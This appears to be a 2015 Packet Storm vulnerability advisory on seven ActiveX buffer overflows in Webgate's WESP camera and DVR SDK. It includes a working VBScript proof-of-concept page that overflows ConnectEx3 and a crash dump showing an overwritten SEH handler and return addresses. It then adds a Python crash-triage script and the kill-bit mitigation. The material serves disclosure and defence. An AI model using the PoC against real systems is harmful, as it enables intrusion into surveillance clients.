
Webgate Buffer Overflow

🗓️ 24 Feb 2015 00:00:00 · Reported by Praveen Darshanam · Type: packetstorm
🔗 packetstormsecurity.com

WESP SDK WESPMonitorCtrl ActiveX LoadImage Buffer Overflow in Webgate technology's image processing O/S and web server camera

Code
Webgate technology is focused on digital image processing, embedded system design and networking to produce embedded O/S and web server cameras providing real time images. We are also making superior network stand-alone DVRs by applying our accumulated network and video solution knowledge.

WEBGATE Embedded Standard Protocol (WESP) SDK supports the same tools in both network DVR and network camera.

Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax Technology, Fujitsu AOS Technology, inc

http://www.webgateinc.com/wgi/eng/#2
http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html

Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage Buffer Overflow
Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword Buffer Overflow
Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImageEx Buffer Overflow
Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX Connect Buffer Overflow
Vulnerability 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow
Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect Buffer Overflow
Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX ConnectEx3 Buffer Overflow

Version information of the affected module:

```text
CompanyName      WebgateInc
FileDescription  WESPConfig Module
FileVersion      1, 6, 42, 0
InternalName     WESPConfig
LegalCopyright   Copyright (C) 2004-2010
OriginalFileName WESPConfig.DLL
ProductName      WESPConfig Module
ProductVersion   1, 6, 42, 0
```

PoC for one of the above vulnerabilities (Vulnerability 7, ConnectEx3):

```html
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<!--
targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll"
prototype = "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address As
String , ByVal Port As Integer , ByVal UserID As String , ByVal Password
As String , ByVal extcompany As Long , ByVal authType As Long , ByVal
AdditionalCode As String )"
memberName = "ConnectEx3"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
argCount = 8
-->
<script language='vbscript'>

arg1=1
arg2=String(1044, "A")
arg3=1
arg4="defaultV"
arg5="defaultV"
arg6=1
arg7=1
arg8="defaultV"

target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8

</script>
</html>
```

Stack trace for the above PoC:

```text
Exception Code: ACCESS_VIOLATION
Disasm: 76ACD33D MOV CX,[EAX]

Seh Chain:
--------------------------------------------------
1 41414141


Called From Returns To
--------------------------------------------------
msvcrt.76ACD33D WESPPlayback.999539
WESPPlayback.999539 41414141
41414141 22E5E0
22E5E0 2F712C
2F712C 41414141
41414141 41414141
41414141 41414141
41414141 41414141


Registers:
--------------------------------------------------
EIP 76ACD33D
EAX 41414141
EBX 039E0040 -> 009DF298
ECX E0551782
EDX 41414141
EDI 76AD4137 -> 8B55FF8B
ESI 76ACD335 -> 8B55FF8B
EBP 0022E56C -> 039E0020
ESP 0022E56C -> 039E0020


Block Disassembly:
--------------------------------------------------
76ACD333 NOP
76ACD334 NOP
76ACD335 MOV EDI,EDI
76ACD337 PUSH EBP
76ACD338 MOV EBP,ESP
76ACD33A MOV EAX,[EBP+8]
76ACD33D MOV CX,[EAX] <--- CRASH
76ACD340 INC EAX
76ACD341 INC EAX
76ACD342 TEST CX,CX
76ACD345 JNZ SHORT 76ACD33D
76ACD347 SUB EAX,[EBP+8]
76ACD34A SAR EAX,1
76ACD34C DEC EAX
76ACD34D POP EBP


ArgDump:
--------------------------------------------------
EBP+8 41414141
EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+20 00000829
EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Stack Dump:
--------------------------------------------------
22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00 [................]
22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00 [.q.......q......]
22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00 [.o..............]
22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
```

P.S. CERT tried to coordinate with the vendor for fixing the issues but there wasn't any response from the vendor.

Best Regards,
Praveen Darshanam
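The crash dump above already contains the facts a triager needs. The loop at 76ACD335 (MOV CX,[EAX]; INC EAX; INC EAX; TEST CX,CX; JNZ) reads a wide-character string two bytes at a time until it hits a NUL, i.e. a wcslen-style length computation, and it faults because the pointer it was handed ([EBP+8], loaded into EAX) is already 0x41414141. The SEH handler and several saved return addresses are 0x41414141 as well, so the 1044-character Address string has overwritten the caller's stack frame before the length of any argument was even computed. The Python below is an added example, not part of the advisory, that automates that reading of a crash report in the layout used above: it parses the SEH chain, call chain and registers (sample text quoted from the advisory, trimmed to those sections), flags 32-bit values that consist of one repeated printable byte such as the A (0x41) filler, and returns a triage verdict. The report format it accepts, the function names and the verdict strings are the example's own assumptions.

```python
import re

# Crash report quoted from the advisory above (trimmed to the sections the
# triage uses); the layout is the one the advisory's debugger output uses.
CRASH_REPORT = """\
Exception Code: ACCESS_VIOLATION
Disasm: 76ACD33D MOV CX,[EAX]

Seh Chain:
--------------------------------------------------
1 41414141

Called From Returns To
--------------------------------------------------
msvcrt.76ACD33D WESPPlayback.999539
WESPPlayback.999539 41414141
41414141 22E5E0
22E5E0 2F712C
2F712C 41414141
41414141 41414141

Registers:
--------------------------------------------------
EIP 76ACD33D
EAX 41414141
EBX 039E0040 -> 009DF298
ECX E0551782
EDX 41414141
EDI 76AD4137 -> 8B55FF8B
ESI 76ACD335 -> 8B55FF8B
EBP 0022E56C -> 039E0020
ESP 0022E56C -> 039E0020
"""


def is_fill_pattern(word):
    """True when a 32-bit hex value is one printable byte repeated four times,
    e.g. 41414141 from a String(1044, "A") argument (assumed filler heuristic)."""
    if not re.fullmatch(r"[0-9A-Fa-f]{8}", word):
        return False
    chunks = {word[i:i + 2].upper() for i in range(0, 8, 2)}
    return len(chunks) == 1 and 0x20 <= int(word[:2], 16) <= 0x7E


def parse_crash_report(text):
    """Split the report into exception, faulting instruction, SEH chain,
    (called_from, returns_to) pairs and a register map."""
    rep = {"exception": None, "disasm": None, "seh": [], "calls": [], "regs": {}}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("---"):
            continue
        if line.startswith("Exception Code:"):
            rep["exception"] = line.split(":", 1)[1].strip()
        elif line.startswith("Disasm:"):
            rep["disasm"] = line.split(":", 1)[1].strip()
        elif line.endswith(":") or line.startswith("Called From"):
            section = line.rstrip(":")            # new section header
        else:
            parts = line.split()
            if len(parts) < 2:
                continue
            if section == "Seh Chain":
                rep["seh"].append(parts[1])       # "<index> <handler>"
            elif section == "Called From Returns To":
                rep["calls"].append((parts[0], parts[1]))
            elif section == "Registers":
                rep["regs"][parts[0]] = parts[1]  # "<reg> <value> [-> deref]"
    return rep


def triage(rep):
    """Return (verdict, findings) for a parsed report."""
    findings = []
    control_hit = False  # filler reached control-flow metadata (SEH, return, EIP)
    if any(is_fill_pattern(h) for h in rep["seh"]):
        findings.append("SEH handler overwritten with fill pattern")
        control_hit = True
    if any(is_fill_pattern(ret) for _, ret in rep["calls"]):
        findings.append("saved return address(es) overwritten with fill pattern")
        control_hit = True
    if is_fill_pattern(rep["regs"].get("EIP", "")):
        findings.append("EIP holds fill pattern (direct control of execution)")
        control_hit = True
    # Did the faulting instruction dereference a register holding the pattern?
    # That is the MOV CX,[EAX] case in the dump above (EAX = 41414141).
    m = re.search(r"\[(E[A-Z]{2})", rep["disasm"] or "")
    ptr_hit = bool(m) and is_fill_pattern(rep["regs"].get(m.group(1), ""))
    if ptr_hit:
        findings.append(f"fault reading through {m.group(1)}=0x{rep['regs'][m.group(1)]} (controlled pointer)")
    tainted = sorted(r for r, v in rep["regs"].items() if is_fill_pattern(v))
    if tainted:
        findings.append("registers holding fill pattern: " + ", ".join(tainted))
    if control_hit:
        verdict = "likely exploitable: control-flow data corrupted"
    elif ptr_hit:
        verdict = "probably exploitable: read through controlled pointer"
    elif tainted:
        verdict = "suspicious: controlled data in registers, control flow intact"
    else:
        verdict = "unknown: no fill pattern reached control data"
    return verdict, findings


if __name__ == "__main__":
    verdict, findings = triage(parse_crash_report(CRASH_REPORT))
    print(verdict)
    for finding in findings:
        print(" -", finding)
```

Run it as a script, or call triage(parse_crash_report(text)) on any fresh report in the same layout; on the advisory's dump it reports the overwritten SEH handler, the overwritten return addresses and the read through EAX, and rates the crash as likely exploitable. Where the vendor does not respond, as the P.S. above notes, the standard host-side mitigation for an ActiveX control is its kill bit: a Compatibility Flags DWORD of 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID} (and the Wow6432Node equivalent for the 32-bit browser on 64-bit Windows) stops Internet Explorer from instantiating the CLSID used in the PoC regardless of the calling page.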
